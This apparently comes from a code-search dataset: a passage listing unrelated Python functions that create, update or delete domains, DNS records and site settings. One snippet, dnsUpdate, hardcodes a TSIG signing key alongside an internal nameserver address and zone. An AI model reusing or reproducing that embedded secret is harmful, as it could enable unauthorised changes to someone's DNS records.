session.query(Domain).filter_by(\n domain_name=request.form[\"domain-name\"]).first()\n if domain:\n message = \"{}Error!{} {}{}{} already exists.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n\n # Find existing Provider otherwise create new Provider object\n provider = session.query(Provider).filter(\n Provider.provider_url == request.form[\"provider-url\"]).first()\n if not provider:\n provider = Provider(provider_url=request.form[\"provider-url\"])\n\n # Get existing category name object from CategoryName table\n category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"]).first()\n\n domain = Domain(\n category=Category(),\n domain_name=request.form[\"domain-name\"],\n ip=request.form[\"ip-address\"],\n provider=provider)\n domain.category.category_name = category_name\n domain.status.append(Status(status_type=\"added\"))\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Added {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message , \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Could not add add {}{}{}.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n\n if request.form[\"submit\"] == \"Submit\":\n return redirect(url_for(\"home\"))\n else:\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n else:\n return render_template(\"add_domain.html\", today=today,\n category_names=category_names)", "def test_domain_changes_new_sitename_empty_domain_matches(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='site1.com', domain='site1.com')\n site_2 = Site.objects.create(name='site2.com', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'other-site1.com'},\n site_2.pk: {'name': None, 'domain': 'other-site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'other-site1.com')\n self.assertEquals(s.domain, 'other-site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'other-site2.com')\n self.assertEquals(s.domain, 'other-site2.com')", "def updateSites(self):\n updated_entry = self.client.Update(self.entry)\n return updated_entry", "def change_user_domain(self, user_domain, domain_format='name'):\n self.creds['user_domain_%s' % domain_format] = user_domain", "def domain(self, value):\n if hasattr(self, \"_domain\"):\n raise ValueError(\"A ServerName's domain cannot be changed.\")\n if value is None:\n raise ValueError(\"A ServerName must be given a domain.\")\n if not isinstance(value, str):\n raise TypeError(\"The domain must be a string, not %s.\" % (type(value)))\n if value is \"\":\n raise ValueError(\"A empty string is not a valid domain.\")\n self._domain = value", "def domain_id(self, domain_id):\n\n self._domain_id = domain_id", "def test_domain_unchanged_new_sitename_empty_domain_different(self):\n from 
django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='Site 1', domain='site1.com')\n site_2 = Site.objects.create(name='Site 2', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'site1.com'},\n site_2.pk: {'name': None, 'domain': 'site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'Site 1')\n self.assertEquals(s.domain, 'site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'Site 2')\n self.assertEquals(s.domain, 'site2.com')", "def _update_domainmetadata(self, domain_id, kind, values=None,\n delete=True):\n # Fetch all current metadata of the specified kind\n values = values or []\n\n query = self.session.query(models.DomainMetadata)\n query = query.filter_by(domain_id=domain_id, kind=kind)\n\n metadatas = query.all()\n\n for metadata in metadatas:\n if metadata.content not in values:\n if delete:\n LOG.debug('Deleting stale domain metadata: %r' %\n tuple([domain_id, kind, metadata.value]))\n # Delete no longer necessary values\n metadata.delete(self.session)\n else:\n # Remove pre-existing values from the list of values to insert\n values.remove(metadata.content)\n\n # Insert new values\n for value in values:\n LOG.debug('Inserting new domain metadata: %r' %\n tuple([domain_id, kind, value]))\n m = models.DomainMetadata(domain_id=domain_id, kind=kind,\n content=value)\n m.save(self.session)", "def test_put(populate_hostnames, authenticated_client):\n rv = authenticated_client.get(\n '/api/observables/{0:d}/'.format(populate_hostnames[0].id))\n observable_json = json.loads(rv.data)\n rv = authenticated_client.put(\n '/api/observables/{0:d}/'.format(observable_json['id']),\n data=json.dumps({'value': 'qwe'}),\n content_type='application/json')\n assert rv.status_code == 400\n response = json.loads(rv.data)\n assert 'ValidationError' in response\n assert 'not a valid string for domain-name' in response['ValidationError']", "def delete_domain(DomainName=None):\n pass", "def pre_domain_update(self, resource_id, resource_dict):\n pass", "def dnsUpdate(portId, ipAddr='', action='create'):\n\tzone = 'osdev.skrill.net.'\n\trevZone = '23.32.10.in-addr.arpa'\n\tcname = portId + '.' 
+ zone\n\tttl = 300\n\tnsServer = '10.32.29.99'\n key = 'yw0ADuZjXAhcGgMOYg/Clx1128iUSfhlOHdsY4CzVNIVVVXismrAe+WKMBxocLhbrIVHGvmR94jDC46K18K6oQ=='\n keyRing = dns.tsigkeyring.from_text({zone : key})\n\thostName = genHostname(ipAddr)\n\tdnsUpdate = dns.update.Update(zone, keyring=keyRing)\n\tipAddr = str(ipAddr)\n\thostName = str(hostName)\n\tif action == 'create':\n\t\tdnsUpdate.replace( hostName.split('.')[0], ttl, 'A', ipAddr )\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS A record updated for: ' + hostName)\n\t\tdnsUpdate.replace(portId, ttl, 'CNAME', hostName)\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS CNAME record updated for: ' + hostName)\n\t\tdnsUpdate = dns.update.Update(revZone, keyring=keyRing)\n\t\tdnsUpdate.replace(ipAddr.split('.')[3], ttl, 'PTR', hostName)\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS PTR record updated for: ' + hostName)\n\tif action == 'delete':\n\t\ttry:\n\t\t\thostName = dns.resolver.query(cname, 'CNAME')[0].to_text()\n\t\t\tipAddr = dns.resolver.query(hostName, 'A')[0].to_text()\n\t\texcept Exception, e:\n\t\t\tlogging.exception('DNS query failed for cname and A records: ' + cname + ' ' + hostName)\n\t\t\thostName = ''\n\t\t\treturn hostName\n\t\tdnsUpdate.delete(cname, 'CNAME')\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS CNAME record deleted for: ' + portId + ' to ' + hostName)\n\t\tdnsUpdate.delete(hostName.split('.')[0])\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS A record deleted for: ' + hostName)\n\t\tdnsUpdate = dns.update.Update(revZone, keyring=keyRing)\n dnsUpdate.delete(ipAddr.split('.')[3])\n\t\tdnsResponse = dns.query.tcp(dnsUpdate, nsServer )\n\t\tlogging.info('DNS PTR record deleted for: ' + hostName)\n\t\treturn hostName", "def set_domain(self, var, domain) :\n if var not in self.variables :\n raise KeyError(str(var) + \" is not a variable in this problem.\")\n self.domains[var] = sorted(domain[:])\n return self", "def _update_site_configuration(self):\n self.site.configuration.site_values = {'THIRD_PARTY_AUTH_ONLY_DOMAIN': self.email_domain_name}\n self.site.configuration.save()", "def ip_update(self, custom_domain, heroku_host):\n update_pattern = None\n resultmsg = \"TargetHost:%s Result:\" % custom_domain\n new_dns_a_record = None\n\n dns_a_record = self.get_dns_A_record(custom_domain)\n heroku_host_ip = self.get_heroku_host_ip(heroku_host)\n\n #Store A record to Dozens Server\n if dns_a_record is None:\n update_pattern = \"Create\"\n new_dns_a_record = self.create_A_record(heroku_host_ip,\n custom_domain, Config.DEFAULT_TTL)\n elif dns_a_record[\"content\"] != heroku_host_ip:\n update_pattern = \"Update\"\n new_dns_a_record = self.update_A_record(heroku_host_ip,\n dns_a_record)\n elif dns_a_record[\"content\"] == heroku_host_ip:\n update_pattern = \"Already updated\"\n new_dns_a_record = dns_a_record\n\n #Evaluate and cache the result\n if new_dns_a_record is not None:\n resultmsg += \"Success.%s%s\" % (update_pattern, new_dns_a_record)\n resultflg = True\n if update_pattern != \"Alread updated\":\n self._set_cache(custom_domain, new_dns_a_record)\n else:\n resultmsg += \"Fail. 
%s.\" % update_pattern\n resultflg = False\n\n return (resultflg, resultmsg)", "def update_record(self, record, name=None, type=None, data=None, extra=None):\n params = {\"type\": record.type, \"name\": record.name, \"data\": data}\n if data is None:\n params[\"data\"] = record.data\n if extra:\n try:\n params[\"priority\"] = extra[\"priority\"]\n except KeyError:\n params[\"priority\"] = None\n try:\n params[\"port\"] = extra[\"port\"]\n except KeyError:\n params[\"port\"] = None\n try:\n params[\"weight\"] = extra[\"weight\"]\n except KeyError:\n params[\"weight\"] = None\n\n if \"ttl\" in extra:\n params[\"ttl\"] = extra[\"ttl\"]\n\n res = self.connection.request(\n \"/v2/domains/{}/records/{}\".format(record.zone.id, record.id),\n data=json.dumps(params),\n method=\"PUT\",\n )\n\n return Record(\n id=res.object[\"domain_record\"][\"id\"],\n name=res.object[\"domain_record\"][\"name\"],\n type=record.type,\n data=data,\n zone=record.zone,\n ttl=res.object[\"domain_record\"].get(\"ttl\", None),\n driver=self,\n extra=extra,\n )", "def test_domain_unchanged_new_sitename_empty_domain_matches(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='site1.com', domain='site1.com')\n site_2 = Site.objects.create(name='site2.com', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'site1.com'},\n site_2.pk: {'name': None, 'domain': 'site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'site1.com')\n self.assertEquals(s.domain, 'site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'site2.com')\n self.assertEquals(s.domain, 'site2.com')", "def domainRouterSet(self, domain, body):\n pass", "def on_the_active_directory_page_input_the_domain_name_ad_domain(driver, ad_domain):\n global domain\n domain = ad_domain\n assert wait_on_element(driver, 5, '//h3[@class=\"formtitle\" and text()=\"Active Directory\"]')\n assert wait_on_element(driver, 7, '//input[@ix-auto=\"input__Domain Name\"]', 'inputable')\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain Name\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain Name\"]').send_keys(ad_domain)", "async def setjrremove(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n \n try:\n allowedDomains.remove(domain)\n except:\n await ctx.send(\"Something went wrong :( Check if you have the name right using `[p]setjsonrequest list`\")\n else:\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def save(\n server_context: ServerContext,\n schema_name: str,\n query_name: str,\n domain: Domain,\n container_path: str = None,\n options: Dict = None,\n) -> any:\n url = server_context.build_url(\"property\", \"saveDomain.api\", container_path=container_path)\n payload = {\n \"domainDesign\": domain.to_json(),\n \"queryName\": query_name,\n \"schemaName\": schema_name,\n }\n\n if options is not None:\n payload[\"options\"] = options\n\n return server_context.make_request(url, json=payload)", "def update_zone(self, zone, domain, type=\"master\", ttl=None, extra=None, ex_raw=False):\n if extra is not None:\n not_specified = [key for key in zone.extra.keys() if key not in extra.keys()]\n else:\n not_specified = zone.extra.keys()\n\n if ttl is None:\n ttl = zone.ttl\n\n params = {\"DOMAIN\": domain, \"TTL\": ttl}\n\n for key in not_specified:\n params[key] = 
zone.extra[key]\n if extra is not None:\n params.update(extra)\n if ex_raw:\n action = \"/api_dns_modify_raw.asp\"\n if self.reseller_id is not None:\n action = \"/api_dns_modify_raw_reseller.asp\"\n method = \"POST\"\n else:\n action = \"/api_dns_modify.asp\"\n if self.reseller_id is not None:\n action = \"/api_dns_modify_reseller.asp\"\n method = \"GET\"\n response = self.connection.request(action, params=params, method=method) # noqa\n zone = self.get_zone(zone.id)\n return zone", "def _update_domains_on_server_update(self, server):\n ns_rec_content = self._sanitize_content(\"NS\", server['name'])\n\n LOG.debug(\"Content field of existing NS records will be updated\"\n \" to the following upon server update: %s\" % ns_rec_content)\n try:\n\n # Execute the manually prepared query\n # A TX is required for, at the least, SQLite.\n #\n self.session.begin()\n\n # first determine the old name of the server\n # before making the updates. Since the value\n # is coming from an NS record, the server name\n # will not have a trailing period (.)\n old_ns_rec = self.session.query(models.Record)\\\n .filter_by(type='NS', designate_id=server['id'])\\\n .first()\n if old_ns_rec is not None:\n old_server_name = old_ns_rec.content\n\n LOG.debug(\"old server name read from a backend NS record:\"\n \" %s\" % old_server_name)\n LOG.debug(\"new server name: %s\" % server['name'])\n\n # Then update all NS records that need updating\n # Only the name of a server has changed when we are here\n self.session.query(models.Record)\\\n .filter_by(type='NS', designate_id=server['id'])\\\n .update({\"content\": ns_rec_content})\n\n # Then update all SOA records as necessary\n # Do the SOA last, ensuring we don't trigger a NOTIFY\n # before the NS records are in place.\n #\n # Update the content field of every SOA record that has the\n # old server name as part of its 'content' field to reflect\n # the new server name.\n # Need to strip the trailing period from the server['name']\n # before using it to replace the old_server_name in the SOA\n # record since the SOA record already has a trailing period\n # and we want to keep it\n self.session.execute(models.Record.__table__\n .update()\n .where(and_(models.Record.__table__.c.type == \"SOA\",\n models.Record.__table__.c.content.like\n (\"%s%%\" % old_server_name)))\n .values(content=func.replace(\n models.Record.__table__.c.content,\n old_server_name,\n server['name'].rstrip('.'))\n )\n )\n\n except Exception:\n with excutils.save_and_reraise_exception():\n self.session.rollback()\n # now commit\n else:\n self.session.commit()", "async def setjradd(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n allowedDomains.append(domain)\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def set_domain_sid(self, sid):\n dsdb._samdb_set_domain_sid(self, sid)", "def update(self, host_id, values):\n if not values:\n return _('No values to update passed.')\n return self._update('/os-hosts/%s' % host_id, values,\n response_key='host')", "def update_dns(self):\n if self.ptr:\n which_zone = None\n zones = dns.models.Zone.objects.all()\n for zone in zones:\n if self.ptr.endswith(zone.name) or self.ptr.endswith(zone.name + '.'):\n which_zone = zone\n break\n\n if which_zone:\n zone_name = which_zone.name\n record_name = self.ptr[:-len(zone_name)] if not self.ptr.endswith('.') else self.ptr[:-len(zone_name) - 1]\n if record_name.endswith('.'):\n record_name = record_name[:-1]\n 
record_type = 'A' if self.family == 4 else 'AAAA'\n\n dns.models.Record.objects.get_or_create(\n name=record_name,\n record_type=record_type,\n zone=which_zone,\n address=self\n )", "def populate_domain_data(self, domain):\n self.domain_resolve(domain)\n domain_data = server.get_domain_data(domain)['data']['userdata']\n\n self.domain_data[domain] = self.domain_resolve(domain)\n\n if domain in self.domain_data.keys():\n try:\n self.domain_data[domain]['documentroot'] = domain_data['documentroot']\n self.domain_data[domain]['ip'] = domain_data['ip']\n except KeyError:\n self.domain_data[domain]['documentroot'] = \"No domain data found, admin should check\"\n self.domain_data[domain]['ip'] = \"No domain data found, admin should check\"", "def fusion_api_edit_directory(self, body, uri, api=None, headers=None):\n return self.logindomain.update(body, uri, api, headers)", "def ModifyGroupDomainConfig(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"ModifyGroupDomainConfig\", params, headers=headers)\n response = json.loads(body)\n model = models.ModifyGroupDomainConfigResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def put(id_=None):\n\n logger.debug('Catch PUT request by URL /api/departments/%i.', id_)\n try:\n args = department_args.parse_args()\n ds.update(id_, name=args['name'], email=args['email'])\n except Exception:\n return {'message': \"Can't update department.\"}, 404\n return marshal_departments(ds.get(id_)), 200", "def update(self, organisation: Organisation) -> None:\n ...", "def ad_domain_info(self, ad_domain_info):\n self._ad_domain_info = ad_domain_info", "def update_record(self, context, record):\n record = self.dns_manager.update_record(context, record)\n return record", "def return_domain_updated(hostname, domain_name, value1, value2, value3, username):\n #Established the connection\n myconnection = ssh_connection(hostname, username)\n if myconnection == 1:\n return \"Connection to %s failed\" % hostname\n else:\n if domain_name == \"default\":\n #We will to test if the domain already exist in the postfix configuration\n commandline=\"sudo /usr/sbin/postconf -P */unix/syslog_name | cut -d '/' -f 1 | grep default_destination \"\n stdin, stdout, stderr = myconnection.exec_command(commandline)\n if stdout.read():\n #The domain does not exist, exit\n return \"This domain already exist\"\n else:\n list = []\n #Command to send to the host\n commandline=\"sudo /usr/sbin/postconf -e default_destination_concurrency_limit=%d\" % value1\n #We added the commanline(s) to a list.\n #Paramiko can only send one command at a time\n list.append(commandline)\n #Next command\n commandline=\"sudo /usr/sbin/postconf -e default_destination_recipient_limit=%d\" % value2\n list.append(commandline)\n commandline=\"sudo /usr/sbin/postconf -e default_destination_rate_delay=%ds\" % value3\n list.append(commandline)\n\n #We send the commands\n for i in list:\n stdin, stdout, stderr = myconnection.exec_command(i)\n #if error\n if stderr.read():\n is_added=False\n else:\n is_added=True\n\n if is_added == True:\n #Reload conf postfix\n stdin, stdout, stderr = myconnection.exec_command(\"sudo /etc/init.d/postfix reload\")\n if stderr.read():\n return \"The domain has not been updated. Failed. The server postfix has not restarted. 
Please contact system administrator \"\n else:\n return \"The domain %s has been updated\" % domain_name\n else:\n return \"The domain has not been updated. Failed, please contact system administrator \"\n\n else:\n #We will to test if the domain already exist in the postfix configuration\n commandline=\"sudo /usr/sbin/postconf -P */unix/syslog_name | cut -d '/' -f 1 | grep %s \" % domain_name\n stdin, stdout, stderr = myconnection.exec_command(commandline)\n if not stdout.read():\n #The domain does not exist, exit\n return \"This domain does not exist, you can't update it\"\n else:\n list = []\n #Command to send to the host\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_concurrency_limit=%s\" % (domain_name, value1)\n #We added the commanline(s) to a list.\n #Paramiko can only send one command at a time\n list.append(commandline)\n #Next command\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_recipient_limit=%s\" % (domain_name, value2)\n list.append(commandline)\n commandline=\"sudo /usr/sbin/postconf -e %s_destination_rate_delay=%ss\" % (domain_name, value3)\n list.append(commandline)\n\n #We send the commands\n for i in list:\n stdin, stdout, stderr = myconnection.exec_command(i)\n #if error\n if stderr.read():\n is_added=False\n else:\n is_added=True\n\n if is_added == True:\n #Reload conf postfix\n stdin, stdout, stderr = myconnection.exec_command(\"sudo /etc/init.d/postfix reload\")\n if stderr.read():\n return \"The domain has not been updated. Failed. The server postfix has not restarted. Please contact system administrator \"\n else:\n return \"The domain %s has been updated\" % domain_name\n else:\n return \"The domain has not been updated. Failed, please contact system administrator \"\n\n # Disconnect from the host\n myconnection.close()", "def fusion_api_edit_login_domains_global_settings(self, body, param='', api=None, headers=None):\n return self.domain_settings.put(body, param, api, headers)", "def update(self, host, values):\n body = dict(host=values)\n return self._update(\"/os-hosts/%s\" % host, body, response_key='host')", "def store_domain(self, store_domain):\n self._store_domain = store_domain\n return self", "def update_soa(record):\n if record and record.domain and record.domain.soa:\n record.domain.soa.serial += 1\n record.domain.soa.dirty = True\n record.domain.soa.save()", "def _update_entry(self, section, key, value):\n entries = section[key] if key in section else []\n if type(entries) != list:\n entries = [entries]\n if len(entries) < self.dom_id - 2:\n raise ValueError('Cannot set namelist value for domain %d, previous domains not filled out.' 
% self.dom_id)\n if len(entries) <= self.dom_id - 1:\n entries.append(value)\n else:\n entries[self.dom_id-1] = value\n section[key] = entries", "def create_domain(self, domain: str) -> Session:\n uri = f\"{self.uri}/domains\"\n data = {\n \"hostname\": domain\n }\n response = self.request(uri=uri, method=\"POST\", data=data)\n\n return response", "def test_updatednsrecord(kasserver, kasapi):\n kasserver.add_dns_record(\"test.example.com\", \"CNAME\", \"www.example2.com\")\n assert kasapi.requests_contains(\"update_dns_settings\")", "def update_dns(c, stack_name, domain_name, profile, create=False):\n action = 'create' if create else 'update'\n\n with chdir(WORKING_DIR):\n aws('cloudformation', f'{action}-stack',\n '--stack-name', f'{stack_name}-dns',\n '--template-body', f'file://zone.yaml',\n '--parameters',\n f'ParameterKey=DomainName,ParameterValue={domain_name}',\n f'--profile', f'{profile}')\n\n aws('cloudformation', 'wait',\n f'stack-{action}-complete',\n '--stack-name', f'{stack_name}-dns',\n f'--profile', f'{profile}')\n\n with chdir(WORKING_DIR):\n aws('cloudformation', f'{action}-stack',\n '--stack-name', f'{stack_name}-dns-mail',\n '--template-body', f'file://mail.yaml',\n f'--profile', f'{profile}')", "def domain(self, domain):\n # type: (string_types) -> None\n\n if domain is not None:\n if not isinstance(domain, string_types):\n raise TypeError(\"Invalid type for `domain`, type has to be `string_types`\")\n\n self._domain = domain", "def save(subdomain):\n\tglobal Counter\n\tif db.session.query(Target.id).filter_by(subdomain=subdomain).scalar() is None :\n\t\tdb.session.add(Target(subdomain,str(uuid.uuid4())))\n\t\tdb.session.commit()\n\t\tCounter += 1\n\t\tlogger.log('INFO',f'[+] {subdomain} added to database')\n\telse:\n\t\tlogger.log('ERROR',f'[-] {subdomain} already exists')", "def update(self, _id=None, dynurl_config_data=None):\n data = DataObject()\n data.add_value(\"dynurl_config_data\", dynurl_config_data)\n endpoint = URL_MAPPING + \"/{}\".format(_id)\n response = self.client.put_json(endpoint, data.data)\n response.success = response.status_code == 204\n return response", "def update_attributes_by_domains(etl, update_kwargs):\r\n import arcetl\r\n func = functools.partial(\r\n etl.transform, transformation=arcetl.attributes.update_by_domain_code,\r\n )\r\n tuple(func(**kwargs) for kwargs in update_kwargs)", "def update_dns(self):\n\t\tfor url in self.update_urls:\n\n\t\t\t# Adds protocol if address does not contain it\n\t\t\tif 'http://' not in url: url = 'http://' + url\n\n\t\t\trequest = urllib.urlopen(url)\n\t\t\trequest.close()", "def do_update(self, line):\n\t\tif not(self.db is None):\n\t\t\ttry:\n\t\t\t\tfield = input(\"Field to update: \")\n\t\t\t\tvalue = input(\"Value: \")\n\t\t\t\tquery = {'_id': ObjectId(line)}\n\t\t\t\tnew_vals = {\"$set\": {field: value}}\n\t\t\t\tself.db.contact.update_one(query, new_vals)\n\t\t\texcept Exception:\n\t\t\t\tprint(\"Wrong _id! 
Try again.\")", "def test_update(self, updateRecords=None):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n instance = self._setup_test_cloud_dns_instance('dnsinstance_update', t)\n instance.resource_id = 4\n update_args = self.update_domain_only_args\n self._stubout_update(\n instance,\n fake_dns_instance,\n updateRecords,\n **update_args)\n\n uprops = dict(instance.properties)\n uprops.update({\n 'emailAddress': '[email protected]',\n 'ttl': 5555,\n 'comment': 'updated comment',\n })\n if updateRecords:\n uprops['records'] = updateRecords\n ut = rsrc_defn.ResourceDefinition(instance.name,\n instance.type(),\n uprops)\n instance.state_set(instance.CREATE, instance.COMPLETE)\n scheduler.TaskRunner(instance.update, ut)()\n self.assertEqual((instance.UPDATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def update_company(cls, **kwargs):\n return cls._do_call(\n 'PUT', cls.api_endpoint + 'companies', params=kwargs)", "def domains(self, domains):\n\n self._domains = domains", "def update(name, location, visibility, new_name, tenant_name, client, logger):\n utils.explicit_tenant_name_message(tenant_name, logger)\n validate_visibility(visibility)\n graceful_msg = 'Requested site with name `{0}` was not found'.format(name)\n with handle_client_error(404, graceful_msg, logger):\n client.sites.update(name, location, visibility, new_name)\n logger.info('Site `{0}` updated'.format(name))", "def update_host(self, conf, tenant_id, network_id, host_id, body):\n\t\tpass", "def setDomainRange(self, domain, range):\n self.domain = domain.cloneSpace()\n self.range = range.cloneSpace()\n return", "def update(self):\n record_obj = dict(\n record_id=self.record_id,\n type=self.type,\n ttl=self.ttl,\n priority=self.priority,\n rdata=self.rdata,\n )\n resp = self.call(method='updateZoneRecord',\n args=[self.domainname, self.subdomain, record_obj])\n return resp", "async def update_organization(request: Request, org: str, data: dict):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n if org not in organizations_obj:\n logger.warning(\"Organization %s not found.\", org)\n raise HTTPException(\n status_code=404, detail=\"Organization {} not found.\".format(org))\n organizations_obj[org] = data[\"organization_data\"]\n await redis.set_key(\"influxdb_organizations\", orjson.dumps(organizations_obj))\n logger.info(\"Organization %s updated\", org)\n return {\"message\": \"Organization {} updated\".format(org)}", "def setup_domain(domain):\n bucket = BUCKET_MANAGER.get_bucket(domain)\n\n zone = DOMAIN_MANAGER.find_hosted_zone(domain) \\\n or DOMAIN_MANAGER.create_hosted_zone(domain)\n\n endpoint = util.get_endpoint(BUCKET_MANAGER.get_region_name(bucket))\n a_record = DOMAIN_MANAGER.create_s3_domain_record(zone, domain, endpoint)\n print(\"Domain configure: http://{}\".format(domain))\n print(\"A record created: {}\".format(a_record))", "def set_nfs_domain(session, domain, return_type=None, **kwargs):\n body_values = {'domain': domain}\n\n path = '/api/settings/nfs_domain.json'\n\n return session.post_api(path=path, body=body_values,\n return_type=return_type, **kwargs)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def test_updateContact(self):\n response = self.client.get(self.url)\n qs = response.json()\n contact = qs[0]\n to_update_value = 'address 2'\n 
contact['address'] = to_update_value\n response = self.client.put(self.url + str(contact['id']) + '/', contact, content_type=\"application/json\")\n self.assertEqual(response.status_code, 200)\n contact2 = response.json()\n self.assertEqual(contact2['address'], to_update_value)", "def set_axis_domain(self, axis_id, domain):\n\n assert axis_id in self.axes_domains\n\n if axis_id is not None:\n logger.debug('setting domain of axis %s with %s', str(axis_id),\n str(domain))\n if len(domain) != self.data.shape[axis_id]:\n raise Exception('length of domain values (%d) does not '\n ' match length of data (%d) for axis %s'\n % (len(domain), self.data.shape[axis_id],\n self.get_axis_name(axis_id)))\n self.axes_domains[axis_id] = np.array(domain)", "def update(self, cookies):\n self._update(cookies, domain=None, path=None)", "def test_delete_email_domain(self):\n email_dom = 'delete.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertTrue(domain.delete(email_dom))", "def update(self, **kwargs):\n\n host = self.get()\n if not host:\n self.raiseNotFoundError()\n return host.update(**kwargs)", "def replace(self, domain, sequence):\n index = self._remove_sequence(domain)\n self._add_sequence(index, sequence)", "def updpt():\n try:\n appuser, _ = util.authenticate()\n fields = [\"dsId\", \"dsType\", \"modified\", \"editors\", \"srctl\", \"source\",\n \"date\", \"text\", \"refs\", \"qtype\", \"communities\", \"regions\",\n \"categories\", \"tags\", \"srclang\", \"translations\", \"stats\"]\n ptdat = util.set_fields_from_reqargs(fields, {})\n dbpt = verify_edit_authorization(appuser, ptdat)\n if dbpt:\n dbst = dbpt.get(\"srctl\")\n if dbst and (dbst != ptdat.get(\"srctl\")):\n raise ValueError(\"Source Timeline may not be changed.\")\n util.fill_missing_fields(fields, dbpt, ptdat)\n else: # making a new instance\n for fld in [\"srctl\", \"date\", \"text\"]:\n if not ptdat.get(fld): # required point field value\n raise ValueError(\"Point \" + fld + \" value is required.\")\n # date format validity checking is done client side\n remove_html_from_point_fields(ptdat)\n ptdat[\"lmuid\"] = appuser[\"dsId\"]\n pt = dbacc.write_entity(ptdat, ptdat.get(\"modified\", \"\"))\n except ValueError as e:\n return util.serve_value_error(e)\n return util.respJSON(pt)", "def _sync_domain(self, domain, new_domain_flag=False):\n LOG.debug('Synchronising Domain: %s' % domain['id'])\n\n servers = self.central_service.find_servers(self.admin_context)\n\n recordsets = self.central_service.find_recordsets(\n self.admin_context, {'domain_id': domain['id']})\n\n records = []\n\n for recordset in recordsets:\n criterion = {\n 'domain_id': domain['id'],\n 'recordset_id': recordset['id']\n }\n\n raw_records = self.central_service.find_records(\n self.admin_context, criterion)\n\n for record in raw_records:\n records.append({\n 'name': recordset['name'],\n 'type': recordset['type'],\n 'ttl': recordset['ttl'],\n 'priority': record['priority'],\n 'data': record['data'],\n })\n\n output_folder = os.path.join(os.path.abspath(cfg.CONF.state_path),\n 'bind9')\n\n output_path = os.path.join(output_folder, '%s.zone' %\n \"_\".join([domain['name'], domain['id']]))\n\n utils.render_template_to_file('bind9-zone.jinja2',\n output_path,\n servers=servers,\n domain=domain,\n records=records)\n\n rndc_call = self._rndc_base()\n\n if new_domain_flag:\n rndc_op = [\n 'addzone',\n '%s { type master; file \"%s\"; };' % (domain['name'],\n output_path),\n ]\n rndc_call.extend(rndc_op)\n else:\n rndc_op = 'reload'\n 
